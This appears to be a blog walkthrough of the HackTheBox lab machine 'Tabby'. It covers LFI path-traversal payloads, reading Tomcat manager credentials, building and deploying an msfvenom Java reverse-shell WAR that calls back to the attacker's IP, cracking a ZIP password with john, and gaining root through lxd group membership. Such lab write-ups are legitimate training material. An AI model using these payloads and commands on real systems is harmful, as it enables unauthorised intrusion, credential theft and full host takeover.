---
title: "Hackthebox - Tabby"
date: 2020-08-07T22:15:27+02:00
draft: true
toc: true
images:
tags:
- hackthebox
- walkthrough
- pentest
- easy
---

## Introduction

{{< image src="../../posts-img/hackthebox-tabby/tabby.png" alt="Tabby" position="center" style="border-radius: 2px;" >}}

As you can see, the machine is on Linux with easy difficulty.


## Getting started

Let's start with an **nmap** scan.

```bash
$ nmap -A -T4 -p- -oN scan.nmap 10.10.10.194
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp open  http    Apache Tomcat
|_http-title: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

First let's look at the web page on port 80.

{{< image src="../../posts-img/hackthebox-tabby/index.png" alt="Index Page" position="center" style="border-radius: 2px;" >}}

After looking around the website, only one link works, it leads us to the news page.

{{< image src="../../posts-img/hackthebox-tabby/news.php.png" alt="News Page" position="center" style="border-radius: 2px;" >}}

The **file** parameter looks like an LFI (Local file inclusion) ! So let's make some test.

```bash
?file=news ❌
?file=news.php ❌
?file=../files/statement ✅
  -> same as http://megahosting.htb/files/statement
?file=../index.php ✅
  -> same as http://megahosting.htb/index.php
?file=/etc/password ❌
?file=../../../../../../etc/passwd ✅
  -> Interesting :smile:
?file=php://filter/read=convert.base64-encode/resource=/etc/passwd ❌
?file=php://filter/read=convert.base64-encode/resource=../index.php ❌
?file=php://filter/read=convert.base64-encode/resource=statement ❌
```

The source code seems to be like:
```PHP
include("files/" + $_GET["file"]);
```

I tried to get an RCE (Remote code execution) with the LFI but all my attempts failed.

So I went to check out the Tomcat webpage on port 8080.

{{< image src="../../posts-img/hackthebox-tabby/tomcat.png" alt="Tomcat Page" position="center" style="border-radius: 2px;" >}}

As you can see the admin credentials are saved in an XML file. Let's read it with our LFI.

{{< image src="../../posts-img/hackthebox-tabby/exploiting_LFI.png" alt="Exploiting LFI" position="center" style="border-radius: 2px;" >}}

And bingo ! The user is "tomcat" and the password is "$3cureP4s5w0rd123!".

So now we can log in to the tomcat host manager page.

[Here](https://stackoverflow.com/questions/4432684/tomcat-manager-remote-deploy-script) you can see how to upload WAR file into tomcat. So let's create a WAR reverse shell with **msfvenom**.

```bash
$ msfvenom -p java/shell_reverse_tcp LHOST=10.10.15.87 LPORT=4444 -f war -o revshell.war
Payload size: 13397 bytes
Final size of war file: 13397 bytes
Saved as: revshell.war
```

Then, upload it.

```bash
$ curl -u 'tomcat:$3cureP4s5w0rd123!' -T exploits/revshell.war http://10.10.10.194:8080/manager/text/deploy?path=/revshell
OK - Deployed application at context path [/revshell]
```

And finally run it !

{{< image src="../../posts-img/hackthebox-tabby/revshell_tomcat.png" alt="Reverse Shell WAR" position="center" style="border-radius: 2px;" >}}

Here we go, we have our first shell on the box.

## User flag

After looking around the directories, we can see a ZIP archive named **16162020_backup.zip** which is protected with a password.

```bash
tomcat@tabby:/var/www/html/files$ ls
16162020_backup.zip  archive  revoked_certs  statement
```

Let's crack it !

```bash
$ zip2john 16162020_backup.zip > backup.hash
...
$ john backup.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
admin@it         (16162020_backup.zip)
1g 0:00:00:01 DONE (2020-08-07 18:47) 0.6493g/s 6729Kp/s 6729Kc/s 6729KC/s adnc153..adenabuck
Use the "--show" option to display all of the cracked passwords reliably
Session completed
```

And the password is **admin@it**. The content of the backup file was useless however the password to unzip the archive is the password of the only user of the box named **ash**.

```bash
tomcat@tabby:/var/www/html$ su ash
Password: admin@it
ash@tabby:/var/www/html$
```

## Root flag

As you can see, we are in the **lxd** group.

```bash
ash@tabby:~$ id
uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd)
```

LXD allows you to create linux containers. As we belong to the lxd group, we can create a container and mount our disk (path: /) into the container. So, we can get root on the container and read/write files on the disk of the host.

Let's do it !

On my machine I created the 2 files needed to build an image.
The two files are **lxd.tar.xz** and **rootfs.squashfs**.

```bash
$ sudo apt update
$ sudo apt install -y golang-go debootstrap rsync gpg squashfs-tools
$ go get -d -v github.com/lxc/distrobuilder
$ cd $HOME/go/src/github.com/lxc/distrobuilder
$ make && cd
$ cp $HOME/go/src/github.com/lxc/distrobuilder/doc/examples/ubuntu.yaml .
$ sudo $HOME/go/bin/distrobuilder build-lxd ubuntu.yaml
```

On the box I download the 2 files and run "lxd init" to setup **lxd**.

{{< image src="../../posts-img/hackthebox-tabby/lxd_init.png" alt="LXD Setup" position="center" style="border-radius: 2px;" >}}

Then I create the image.

{{< image src="../../posts-img/hackthebox-tabby/create_img.png" alt="Create IMG" position="center" style="border-radius: 2px;" >}}

And finally I read the root flag.

{{< image src="../../posts-img/hackthebox-tabby/root.png" alt="Root" position="center" style="border-radius: 2px;" >}}

Thanks for reading, hope you enjoyed !
